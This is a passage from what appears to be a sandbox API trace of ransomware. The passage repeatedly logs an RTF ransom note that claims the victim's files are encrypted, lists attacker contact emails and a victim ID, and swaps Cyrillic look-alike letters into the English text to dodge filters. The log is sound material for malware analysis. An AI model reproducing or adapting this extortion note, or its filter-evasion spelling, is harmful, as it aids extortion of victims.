lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0068.016] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0068.016] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 